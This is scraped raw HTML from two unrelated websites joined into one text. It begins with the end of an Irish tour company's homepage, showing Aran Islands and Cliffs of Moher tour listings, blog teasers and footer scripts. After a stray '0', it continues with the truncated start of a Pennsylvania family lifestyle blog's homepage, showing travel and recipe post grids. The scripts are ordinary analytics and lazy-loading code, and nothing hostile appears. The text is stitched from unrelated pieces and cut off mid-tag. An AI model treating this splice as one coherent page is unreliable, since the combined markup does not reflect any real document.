rel="bookmark">Aran Islands Service (Ferry/Shuttle Bus)</a></h3> <a href="http://www.galwaytourcompany.com/tour/aran-islands-service-ferryshuttle-bus/" title="Permalink to Aran Islands Service (Ferry/Shuttle Bus)" rel="bookmark"> <img width="470" height="250" src="http://www.galwaytourcompany.com/wp-content/uploads/2017/02/Photo-21-03-2016-20-25-14-galway-tour-company-470x250.jpg" class="attachment-newsthumb size-newsthumb wp-post-image" alt="" /> </a> <div class="mh"><p>If you are looking for a place to commune with nature, be inspired and find peace to envelop body &#038; soul, look no further than The Aran Islands.</p> </div> <form action="https://www.galwaytourcompany.com/gtc/book1.jsp" method="post"> <a href="http://www.galwaytourcompany.com/tour/aran-islands-service-ferryshuttle-bus/" title="More info" class="moredetails">More details &raquo;</a> <input name="AddBookProductId" type="hidden" value="39"> <input type="submit" class="booknow" id="button7" value="Book Now &raquo;"> </form> </div> <div class="span3"> <h3><a href="http://www.galwaytourcompany.com/tour/1200-half-day-cliffs-of-moher-tour/" title="Permalink to 12:00 Half Day Cliffs Tour including Doolin Village" rel="bookmark">12:00 Half Day Cliffs Tour including Doolin Village</a></h3> <a href="http://www.galwaytourcompany.com/tour/1200-half-day-cliffs-of-moher-tour/" title="Permalink to 12:00 Half Day Cliffs Tour including Doolin Village" rel="bookmark"> <img width="470" height="250" src="http://www.galwaytourcompany.com/wp-content/uploads/2017/02/Photo-04-06-2015-21-28-53-galway-tour-company-470x250.jpg" class="attachment-newsthumb size-newsthumb wp-post-image" alt="Half Day Cliffs of Moher Tour" /> </a> <div class="mh"><p>For travellers arriving late into Galway or those who want a little time to explore the City of Galway in the morning, or maybe you have enjoyed Galway&#8217;s night life to its fullest! This is the Tour for You. Our Half Day Cliffs of Moher Tour will take you directly to the Cliffs for 2 hours before bringing you to Doolin Village and on back to Galway.</p> </div> <form action="https://www.galwaytourcompany.com/gtc/book1.jsp" method="post"> <a href="http://www.galwaytourcompany.com/tour/1200-half-day-cliffs-of-moher-tour/" title="More info" class="moredetails">More details &raquo;</a> <input name="AddBookProductId" type="hidden" value="39"> <input type="submit" class="booknow" id="button8" value="Book Now &raquo;"> </form> </div> </div> </div> </div> </div> <div class="band white"> <div class="container news paddbot"> <div class="row"> <div class="span12"> <hr class="fw" style="margin:0 0 20px 0"> <h2>From Our Blog</h2> <hr class="sm"> </div> <div class="span4 newsitem"> <img width="640" height="428" src="http://www.galwaytourcompany.com/wp-content/uploads/2017/10/connemara.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Connemara" srcset="http://www.galwaytourcompany.com/wp-content/uploads/2017/10/connemara.jpg 640w, http://www.galwaytourcompany.com/wp-content/uploads/2017/10/connemara-300x201.jpg 300w" sizes="(max-width: 640px) 100vw, 640px" /> <h3><a href="http://www.galwaytourcompany.com/connemara-tour-7-wonders/" id="post-630">Connemara Tour: Explore One of the 7 Wonders of the World</a></h3> <p>There is no doubt that there are many beautiful and eye catching places worth visiting in Ireland. Connemara however, is undeniably one of the most beautiful. An ideal holiday location, Connemara offers beautiful sites, good food and lots of activities including cycling and hill walking. The best way to see the most wonderful parts of [&hellip;]</p> <small>Sunday, October 22nd, 2017</small> </div> <div class="span4 newsitem"> <img width="640" height="428" src="http://www.galwaytourcompany.com/wp-content/uploads/2017/10/dunguaire-castle.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Dunguaire Castle" srcset="http://www.galwaytourcompany.com/wp-content/uploads/2017/10/dunguaire-castle.jpg 640w, http://www.galwaytourcompany.com/wp-content/uploads/2017/10/dunguaire-castle-300x201.jpg 300w" sizes="(max-width: 640px) 100vw, 640px" /> <h3><a href="http://www.galwaytourcompany.com/galway-tour/" id="post-609">How to be Prepared Before travelling: The Galway Tour Edition</a></h3> <p>When you are planning for a tour or holiday vacation, it’s important to fully understand what you are letting yourself into. It’s important you’re clear of any hidden challenges that may arise during your travels especially when it comes to international travelling. A professional tour company can be of great help in planning for your [&hellip;]</p> <small>Tuesday, October 3rd, 2017</small> </div> <div class="span4 newsitem"> <img width="849" height="565" src="http://www.galwaytourcompany.com/wp-content/uploads/2017/10/cliffs-of-moher.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Cliffs of Moher" srcset="http://www.galwaytourcompany.com/wp-content/uploads/2017/10/cliffs-of-moher.jpg 849w, http://www.galwaytourcompany.com/wp-content/uploads/2017/10/cliffs-of-moher-300x200.jpg 300w, http://www.galwaytourcompany.com/wp-content/uploads/2017/10/cliffs-of-moher-768x511.jpg 768w" sizes="(max-width: 849px) 100vw, 849px" /> <h3><a href="http://www.galwaytourcompany.com/cliffs-of-moher/" id="post-599">Visit The Cliffs of Moher on a Budget</a></h3> <p>Cliffs of Moher Tour Are you looking to travel but are afraid of spending beyond your means? Travel doesn’t need to be costly, and contrary to popular belief, it’s not exclusive to the rich and famous! It can be done at any budget and to suit any needs, once you do enough research. Whether you [&hellip;]</p> <small>Monday, October 2nd, 2017</small> </div> </div> </div> </div> <!-- <div class="band features"> <div class="container"> <div class="row"> </div> </div> </div> --> <div class="band lightgrey footer"> <div class="container"> <div class="row"> <div class="span3"> </div> <div class="span3"> </div> <div class="span3"> </div> <div class="span3"> <div class="synved_social_share-2"><h3 class="widget-title">Share our site</h3><div><a class="synved-social-button synved-social-button-share synved-social-size-24 synved-social-resolution-single synved-social-provider-facebook nolightbox" data-provider="facebook" target="_blank" rel="nofollow" title="Share on Facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.galwaytourcompany.com&#038;t=Visit%20The%20Cliffs%20of%20Moher%20on%20a%20Budget&#038;s=100&#038;p&#091;url&#093;=http%3A%2F%2Fwww.galwaytourcompany.com&#038;p&#091;images&#093;&#091;0&#093;=http%3A%2F%2Fwww.galwaytourcompany.com%2Fwp-content%2Fuploads%2F2017%2F10%2Fcliffs-of-moher.jpg&#038;p&#091;title&#093;=Visit%20The%20Cliffs%20of%20Moher%20on%20a%20Budget" style="font-size: 0px; width:24px;height:24px;margin:0;margin-bottom:5px;margin-right:5px;"><img alt="Facebook" title="Share on Facebook" class="synved-share-image synved-social-image synved-social-image-share" width="24" height="24" style="display: inline; width:24px;height:24px; margin: 0; padding: 0; border: none; box-shadow: none;" src="http://www.galwaytourcompany.com/wp-content/plugins/social-media-feather/synved-social/image/social/regular/48x48/facebook.png" /></a><a class="synved-social-button synved-social-button-share synved-social-size-24 synved-social-resolution-single synved-social-provider-twitter nolightbox" data-provider="twitter" target="_blank" rel="nofollow" title="Share on Twitter" href="https://twitter.com/intent/tweet?url=http%3A%2F%2Fwww.galwaytourcompany.com&#038;text=Hey%20check%20this%20out" style="font-size: 0px; width:24px;height:24px;margin:0;margin-bottom:5px;margin-right:5px;"><img alt="twitter" title="Share on Twitter" class="synved-share-image synved-social-image synved-social-image-share" width="24" height="24" style="display: inline; width:24px;height:24px; margin: 0; padding: 0; border: none; box-shadow: none;" src="http://www.galwaytourcompany.com/wp-content/plugins/social-media-feather/synved-social/image/social/regular/48x48/twitter.png" /></a><a class="synved-social-button synved-social-button-share synved-social-size-24 synved-social-resolution-single synved-social-provider-google_plus nolightbox" data-provider="google_plus" target="_blank" rel="nofollow" title="Share on Google+" href="https://plus.google.com/share?url=http%3A%2F%2Fwww.galwaytourcompany.com" style="font-size: 0px; width:24px;height:24px;margin:0;margin-bottom:5px;margin-right:5px;"><img alt="google_plus" title="Share on Google+" class="synved-share-image synved-social-image synved-social-image-share" width="24" height="24" style="display: inline; width:24px;height:24px; margin: 0; padding: 0; border: none; box-shadow: none;" src="http://www.galwaytourcompany.com/wp-content/plugins/social-media-feather/synved-social/image/social/regular/48x48/google_plus.png" /></a><a class="synved-social-button synved-social-button-share synved-social-size-24 synved-social-resolution-single synved-social-provider-reddit nolightbox" data-provider="reddit" target="_blank" rel="nofollow" title="Share on Reddit" href="http://www.reddit.com/submit?url=http%3A%2F%2Fwww.galwaytourcompany.com&#038;title=Visit%20The%20Cliffs%20of%20Moher%20on%20a%20Budget" style="font-size: 0px; width:24px;height:24px;margin:0;margin-bottom:5px;margin-right:5px;"><img alt="reddit" title="Share on Reddit" class="synved-share-image synved-social-image synved-social-image-share" width="24" height="24" style="display: inline; width:24px;height:24px; margin: 0; padding: 0; border: none; box-shadow: none;" src="http://www.galwaytourcompany.com/wp-content/plugins/social-media-feather/synved-social/image/social/regular/48x48/reddit.png" /></a><a class="synved-social-button synved-social-button-share synved-social-size-24 synved-social-resolution-single synved-social-provider-pinterest nolightbox" data-provider="pinterest" target="_blank" rel="nofollow" title="Pin it with Pinterest" href="http://pinterest.com/pin/create/button/?url=http%3A%2F%2Fwww.galwaytourcompany.com&#038;media=http%3A%2F%2Fwww.galwaytourcompany.com%2Fwp-content%2Fuploads%2F2017%2F10%2Fcliffs-of-moher.jpg&#038;description=Visit%20The%20Cliffs%20of%20Moher%20on%20a%20Budget" style="font-size: 0px; width:24px;height:24px;margin:0;margin-bottom:5px;margin-right:5px;"><img alt="pinterest" title="Pin it with Pinterest" class="synved-share-image synved-social-image synved-social-image-share" width="24" height="24" style="display: inline; width:24px;height:24px; margin: 0; padding: 0; border: none; box-shadow: none;" src="http://www.galwaytourcompany.com/wp-content/plugins/social-media-feather/synved-social/image/social/regular/48x48/pinterest.png" /></a><a class="synved-social-button synved-social-button-share synved-social-size-24 synved-social-resolution-single synved-social-provider-linkedin nolightbox" data-provider="linkedin" target="_blank" rel="nofollow" title="Share on Linkedin" href="http://www.linkedin.com/shareArticle?mini=true&#038;url=http%3A%2F%2Fwww.galwaytourcompany.com&#038;title=Visit%20The%20Cliffs%20of%20Moher%20on%20a%20Budget" style="font-size: 0px; width:24px;height:24px;margin:0;margin-bottom:5px;margin-right:5px;"><img alt="linkedin" title="Share on Linkedin" class="synved-share-image synved-social-image synved-social-image-share" width="24" height="24" style="display: inline; width:24px;height:24px; margin: 0; padding: 0; border: none; box-shadow: none;" src="http://www.galwaytourcompany.com/wp-content/plugins/social-media-feather/synved-social/image/social/regular/48x48/linkedin.png" /></a><a class="synved-social-button synved-social-button-share synved-social-size-24 synved-social-resolution-single synved-social-provider-mail nolightbox" data-provider="mail" rel="nofollow" title="Share by email" href="mailto:?subject=Visit%20The%20Cliffs%20of%20Moher%20on%20a%20Budget&#038;body=Hey%20check%20this%20out:%20http%3A%2F%2Fwww.galwaytourcompany.com" style="font-size: 0px; width:24px;height:24px;margin:0;margin-bottom:5px;"><img alt="mail" title="Share by email" class="synved-share-image synved-social-image synved-social-image-share" width="24" height="24" style="display: inline; width:24px;height:24px; margin: 0; padding: 0; border: none; box-shadow: none;" src="http://www.galwaytourcompany.com/wp-content/plugins/social-media-feather/synved-social/image/social/regular/48x48/mail.png" /></a></div></div> </div> </div> </div> </div> <div class="band grey copyright"> <div class="container"> <div class="row"> <div class="span8"> </div> <div class="span4 txtright"> Website by VooDoo </div> </div> </div> </div> <noscript><img height="1" width="1" style="display: none;" src="https://www.facebook.com/tr?id=111386426221556&ev=PageView&noscript=1" alt="facebook_pixel"></noscript> <noscript><img height="1" width="1" style="display: none;" src="https://www.facebook.com/tr?id=111386426221556&ev=GeneralEvent&noscript=1&cd[post_type]=page&cd[post_id]=2&cd[content_name]=Home" alt="facebook_pixel"></noscript> <script type='text/javascript' src='http://www.galwaytourcompany.com/wp-content/themes/tours/js/app.min.js?ver=1.2.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"http:\/\/www.galwaytourcompany.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='http://www.galwaytourcompany.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='http://www.galwaytourcompany.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>See Mom Click® | Where food, family, books and travel CLICK</title> <style>.slide-excerpt{width:30%;} .slide-excerpt{top:0;} .slide-excerpt{left:0;} .flexslider{max-width:740px;max-height:480px;} .slide-image{max-height:480px;}</style> <style>@media only screen and (min-device-width : 320px) and (max-device-width : 480px) { .slide-excerpt{display:none !important;} }</style> <meta name="description" content="Central PA lifestyle and family travel blogger. Recipes, entertainment, travel, and family." /> <link rel="canonical" href="https://seemomclick.com/" /> <link rel="next" href="https://seemomclick.com/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="See Mom Click® | Where food, family, books and travel CLICK" /> <meta property="og:description" content="Central PA lifestyle and family travel blogger. Recipes, entertainment, travel, and family." /> <meta property="og:url" content="https://seemomclick.com/" /> <meta property="og:site_name" content="See Mom Click®" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="Central PA lifestyle and family travel blogger. Recipes, entertainment, travel, and family." /> <meta name="twitter:title" content="See Mom Click® | Where food, family, books and travel CLICK" /> <meta name="twitter:site" content="@SeeMomClick" /> <meta name="google-site-verification" content="o5grgyWednuOvUJD8qM4eaV-N5RO-JSDflEIqfBUrg4" /> <link rel='dns-prefetch' href='//scripts.mediavine.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="See Mom Click® &raquo; Feed" href="https://seemomclick.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="See Mom Click® &raquo; Comments Feed" href="https://seemomclick.com/comments/feed/" /> <link rel="stylesheet" type="text/css" href="//seemomclick.com/wp-content/cache/wpfc-minified/g1ke9u17/huwti.css" media="all" /> <style id='brunch-pro-theme-inline-css'>.brunch-pro .site-header{background:#ffffff;} .entry-title, .entry-title a, h1.entry-title, .widgettitle, .recipe-index .widgettitle, .footer-widgets .widgettitle, .site-title a, .site-title a:hover, .site-title a:focus, .brunch-pro .simmer-embedded-recipe .simmer-recipe-title a{color:#6d6e71;} a, .site-footer a:not(.button), .pagination-next:after, .pagination-previous:before{color:#407fc1;} a:hover, a:focus, site-footer a:hover, site-footer a:focus{color:#a5ce39;}</style> <link rel="stylesheet" type="text/css" href="//seemomclick.com/wp-content/cache/wpfc-minified/lncb24io/huwti.css" media="all" /> <link rel='https://api.w.org/' href='https://seemomclick.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://seemomclick.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://seemomclick.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <style>.enews .screenread{height:1px;left:-1000em;overflow:hidden;position:absolute;top:-1000em;width:1px;}</style> <style>:root{--mv-create-radius:0;}</style> <style data-source="Social Pug"></style><link rel="icon" href="https://seemomclick.com/wp-content/themes/brunch-pro-2.1.1/images/favicon.ico" /> <style>.site-title a{background:url(https://seemomclick.com/wp-content/uploads/2019/03/[email protected]) no-repeat !important;}</style> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-51790073-1"></script> <script>window.dataLayer=window.dataLayer||[]; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-51790073-1');</script> <meta name="google-site-verification" content="o5grgyWednuOvUJD8qM4eaV-N5RO-JSDflEIqfBUrg4" /><meta name="p:domain_verify" content="5f17e6ad1d36dbac9813d0b49214d501" /> <meta name="msvalidate.01" content="9EA8771724F3FCAFA1659CE726ECBAA0" /> <style id="tt-easy-google-font-styles">p{color:#000000;font-size:17px;} h1{} h2{} h3{} h4{} h5{} h6{}</style> <script data-wpfc-render="false">var Wpfcll={s:[],osl:0,i:function(){Wpfcll.ss();window.addEventListener('load',function(){window.addEventListener("DOMSubtreeModified",function(e){Wpfcll.osl=Wpfcll.s.length;Wpfcll.ss();if(Wpfcll.s.length > Wpfcll.osl){Wpfcll.ls(false);}},false);Wpfcll.ls(true);});window.addEventListener('scroll',function(){Wpfcll.ls(false);});window.addEventListener('resize',function(){Wpfcll.ls(false);});window.addEventListener('click',function(){Wpfcll.ls(false);});},c:function(e,pageload){var w=document.documentElement.clientHeight || body.clientHeight;var n=pageload ? 0:800;var er=e.getBoundingClientRect();var t=0;var p=e.parentNode;if(typeof p.getBoundingClientRect=="undefined"){var pr=false;}else{var pr=p.getBoundingClientRect();}if(er.x==0 && er.y==0){for(var i=0;i < 10;i++){if(p){if(pr.x==0 && pr.y==0){p=p.parentNode;if(typeof p.getBoundingClientRect=="undefined"){pr=false;}else{pr=p.getBoundingClientRect();}}else{t=pr.top;break;}}};}else{t=er.top;}if(w - t+n > 0){return true;}return false;},r:function(e,pageload){var s=this;var oc,ot;try{oc=e.getAttribute("data-wpfc-original-src");ot=e.getAttribute("data-wpfc-original-srcset");if(oc || ot){if(s.c(e,pageload)){if(oc){e.setAttribute('src',oc);}if(ot){e.setAttribute('srcset',ot);}e.removeAttribute("data-wpfc-original-src");e.removeAttribute("onload");if(e.tagName=="IFRAME"){e.onload=function(){if(typeof window.jQuery !="undefined"){if(jQuery.fn.fitVids){jQuery(e).parent().fitVids({customSelector:"iframe[src]"});}}var s=e.getAttribute("src").match(/templates\/youtube\.html\#(.+)/);var y="https://www.youtube.com/embed/";if(s){try{var i=e.contentDocument || e.contentWindow;if(i.location.href=="about:blank"){e.setAttribute('src',y+s[1]);}}catch(err){e.setAttribute('src',y+s[1]);}}}}}}}catch(error){console.log(error);console.log("==>",e);}},ss:function(){var i=Array.prototype.slice.call(document.getElementsByTagName("img"));var f=Array.prototype.slice.call(document.getElementsByTagName("iframe"));this.s=i.concat(f);},ls:function(pageload){var s=this;[].forEach.call(s.s,function(e,index){s.r(e,pageload);});}};document.addEventListener('DOMContentLoaded',function(){wpfci();});function wpfci(){Wpfcll.i();}</script> </head> <body class="home blog custom-header header-image header-full-width content-sidebar brunch-pro" itemscope itemtype="https://schema.org/WebPage"><div class="site-container"><ul class="genesis-skip-link"><li><a href="#genesis-nav-primary" class="screen-reader-shortcut"> Skip to primary navigation</a></li><li><a href="#genesis-content" class="screen-reader-shortcut"> Skip to content</a></li><li><a href="#genesis-sidebar-primary" class="screen-reader-shortcut"> Skip to primary sidebar</a></li><li><a href="#genesis-footer-widgets" class="screen-reader-shortcut"> Skip to footer</a></li></ul><nav class="nav-primary" aria-label="Main" itemscope itemtype="https://schema.org/SiteNavigationElement" id="genesis-nav-primary"><div class="wrap"><ul id="menu-header-menu" class="menu genesis-nav-menu menu-primary"><li id="menu-item-83707" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-83707"><a title="See Mom Click Homepage" href="https://seemomclick.com/" aria-current="page" itemprop="url"><span itemprop="name">Home</span></a></li> <li id="menu-item-58980" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-58980"><a title="About Lindsay Frank" rel="author" href="https://seemomclick.com/about-me/" itemprop="url"><span itemprop="name">About Lindsay</span></a></li> <li id="menu-item-58978" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-58978"><a title="Contact See Mom Click" href="https://seemomclick.com/contact-me/" itemprop="url"><span itemprop="name">Contact Me</span></a></li> <li id="menu-item-58979" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-58979"><a title="See Mom Click Disclosure Policy" href="https://seemomclick.com/disclosur/" itemprop="url"><span itemprop="name">Disclosure</span></a></li> <li id="menu-item-92115" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-92115"><a title="See Mom Click Privacy Policy" href="https://seemomclick.com/privacy-policy/" itemprop="url"><span itemprop="name">Privacy Policy</span></a></li> </ul></div></nav><header class="site-header" itemscope itemtype="https://schema.org/WPHeader"><div class="wrap"><div class="title-area"><h1 class="site-title" itemprop="headline"><a href="https://seemomclick.com/">See Mom Click®</a></h1><p class="site-description" itemprop="description">Where food, family, books and travel CLICK</p></div></div></header><nav class="nav-secondary" aria-label="Secondary" itemscope itemtype="https://schema.org/SiteNavigationElement"><div class="wrap"><ul id="menu-category-menu" class="menu genesis-nav-menu menu-secondary"><li id="menu-item-58220" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-58220"><a title="See Mom Click Travel" href="https://seemomclick.com/category/travel/" itemprop="url"><span itemprop="name">Travel</span></a></li> <li id="menu-item-58218" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-58218"><a title="See Mom Click Recipes" href="https://seemomclick.com/category/recipes/" itemprop="url"><span itemprop="name">Recipes</span></a></li> <li id="menu-item-58222" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-58222"><a title="See Mom Click Book Deals" href="https://seemomclick.com/category/reading-list/books/" itemprop="url"><span itemprop="name">Books</span></a></li> <li id="menu-item-95324" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-95324"><a title="Home and Family Blog" href="https://seemomclick.com/category/home-and-family/" itemprop="url"><span itemprop="name">Home and Family</span></a></li> <li id="menu-item-98729" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-98729"><a title="Shopping and Reviews" href="https://seemomclick.com/category/shopping-and-reviews/" itemprop="url"><span itemprop="name">Shopping</span></a> <ul class="sub-menu"> <li id="menu-item-90536" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-90536"><a title="See Mom Click Amazon Influencer" href="https://www.amazon.com/shop/seemomclick" itemprop="url"><span itemprop="name">Top Amazon Picks</span></a></li> <li id="menu-item-58216" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-58216"><a title="Online Deals" href="https://seemomclick.com/category/shopping-and-reviews/online-deals/" itemprop="url"><span itemprop="name">Online Deals</span></a></li> </ul> </li> <li id="menu-item-58224" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-58224"><a title="Movies and Music" href="https://seemomclick.com/category/entertainment/" itemprop="url"><span itemprop="name">Entertainment</span></a></li> <li id="menu-item-58221" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-58221"><a title="See Mom Click Giveaways" href="https://seemomclick.com/category/giveaways/" itemprop="url"><span itemprop="name">Giveaways</span></a></li> </ul></div></nav><div class="site-inner"><div class="content-sidebar-wrap"><main class="content" id="genesis-content"> <div class="widget-area home-middle"><section id="featured-post-2" class="widget featured-content featuredpost"><div class="widget-wrap"><h3 class="widgettitle widget-title">Featured Posts</h3> <article class="simple-grid one-third odd first post-91144 post type-post status-publish format-standard has-post-thumbnail category-books category-featured-posts category-kindle tag-books tag-e-books tag-free-kindle-books tag-kindle tag-kindle-books entry"><a href="https://seemomclick.com/10-free-kindle-books-thursday/" title="10 Free Kindle Books &#8211; Thursday" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="900" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2018/06/5-Under-5-Choice-B-680x900.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/10-free-kindle-books-thursday/">10 Free Kindle Books &#8211; Thursday</a></h2></header></article><article class="simple-grid one-third post-98740 post type-post status-publish format-standard has-post-thumbnail category-featured-posts category-recipes tag-recipes-2 tag-side-dish-recipes tag-summer-recipes entry"><a href="https://seemomclick.com/unique-corn-on-the-cob-recipes/" title="Unique Corn on the Cob Recipes" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="900" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2019/05/unique-corn-on-the-cob-recipes-680x900.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/unique-corn-on-the-cob-recipes/">Unique Corn on the Cob Recipes</a></h2></header></article><article class="simple-grid one-third odd post-98694 post type-post status-publish format-standard has-post-thumbnail category-books category-featured-posts category-giveaways tag-books tag-childrens-books tag-giveaways entry"><a href="https://seemomclick.com/ada-twist-questioneers/" title="Ada Twist and the Perilous Pants: The Questioneers Book 2 Giveaway!" class="aligncenter"><img width="680" height="900" src="https://seemomclick.com/wp-content/uploads/2019/05/ada-twist-book-giveaways-680x900.jpeg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/ada-twist-questioneers/">Ada Twist and the Perilous Pants: The Questioneers Book 2 Giveaway!</a></h2></header></article></div></section> <section id="text-28" class="widget widget_text"><div class="widget-wrap"> <div class="textwidget"><center><a class="button" href="https://seemomclick.com/home/">Read More from the Blog</a></center></div></div></section></div><div class="widget-area home-bottom"><section id="featured-post-7" class="widget featured-content featuredpost"><div class="widget-wrap"><h3 class="widgettitle widget-title">Travel</h3> <article class="simple-grid one-third odd first post-98281 post type-post status-publish format-standard has-post-thumbnail category-featured-posts category-hershey-pa category-travel tag-travel tag-visit-harrisburg tag-visit-hershey tag-visit-pennsylvania entry"><a href="https://seemomclick.com/best-places-to-eat-in-hershey-harrisburg/" title="10 Best Places to Eat In Hershey- Harrisburg" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="900" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2019/04/bricco-harrisburg-680x900.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/best-places-to-eat-in-hershey-harrisburg/">10 Best Places to Eat In Hershey- Harrisburg</a></h2></header></article><article class="simple-grid one-third post-98365 post type-post status-publish format-standard has-post-thumbnail category-featured-posts category-travel tag-florida-keys tag-travel tag-visit-florida entry"><a href="https://seemomclick.com/key-west-butterfly-conservatory/" title="Key West Butterfly Conservatory" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="900" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2019/03/rhett-and-scarlet-flamingos-680x900.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/key-west-butterfly-conservatory/">Key West Butterfly Conservatory</a></h2></header></article><article class="simple-grid one-third odd post-98310 post type-post status-publish format-standard has-post-thumbnail category-featured-posts category-travel tag-florida-keys tag-travel tag-visit-florida entry"><a href="https://seemomclick.com/oceans-edge-resort-key-west/" title="Family-Friendly Resort In Key West: Ocean&#8217;s Edge Resort &#038; Marina" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="900" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2019/02/key-west-resorts-680x900.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/oceans-edge-resort-key-west/">Family-Friendly Resort In Key West: Ocean&#8217;s Edge Resort &#038; Marina</a></h2></header></article><p class="more-from-category"><a href="https://seemomclick.com/category/travel/" title="Travel">View More</a></p></div></section> <section id="featured-post-5" class="widget featured-content featuredpost"><div class="widget-wrap"><h3 class="widgettitle widget-title">Recipes</h3> <article class="simple-grid one-third odd first post-98740 post type-post status-publish format-standard has-post-thumbnail category-featured-posts category-recipes tag-recipes-2 tag-side-dish-recipes tag-summer-recipes entry"><a href="https://seemomclick.com/unique-corn-on-the-cob-recipes/" title="Unique Corn on the Cob Recipes" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="900" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2019/05/unique-corn-on-the-cob-recipes-680x900.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/unique-corn-on-the-cob-recipes/">Unique Corn on the Cob Recipes</a></h2></header></article><article class="simple-grid one-third post-98518 post type-post status-publish format-standard has-post-thumbnail category-family-fun category-featured-posts category-recipes tag-cake-recipes tag-dessert-recipes tag-party tag-recipes-2 entry"><a href="https://seemomclick.com/unique-birthday-cakes-for-kids/" title="Unique Birthday Cakes for Kids" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="900" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2019/04/Depositphotos_214514446_xl-2015-680x900.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/unique-birthday-cakes-for-kids/">Unique Birthday Cakes for Kids</a></h2></header></article><article class="simple-grid one-third odd post-98222 post type-post status-publish format-standard has-post-thumbnail category-featured-posts category-recipes tag-bread-recipes tag-recipes-2 entry"><a href="https://seemomclick.com/how-to-make-homemade-breads/" title="How to Make Homemade Breads of All Kind" class="aligncenter"><img onload="Wpfcll.r(this,true);" src="https://seemomclick.com/wp-content/plugins/wp-fastest-cache-premium/pro/images/blank.gif" width="680" height="900" data-wpfc-original-src="https://seemomclick.com/wp-content/uploads/2019/02/louise-lyshoj-785186-unsplash-680x900.jpg" class="entry-image attachment-post" alt="" itemprop="image" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://seemomclick.com/how-to-make-homemade-breads/">How to Make Homemade Breads of All Kind</a></h2></header></article><p class="more-from-category"><a href="https://seemomclick.com/category/recipes/" title="Recipes">View More</a></p></div></section> <section id="featured-post-6" class="widget featured-content featuredpost"><div class="widget-wrap"><h3 class="widgettitle widget-title">Reading List</h3> <article class="simple-grid one-third 